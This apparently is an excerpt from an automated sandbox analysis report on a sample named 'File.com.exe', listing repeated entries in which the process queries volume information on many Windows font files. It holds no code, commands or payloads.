Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\File.com.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
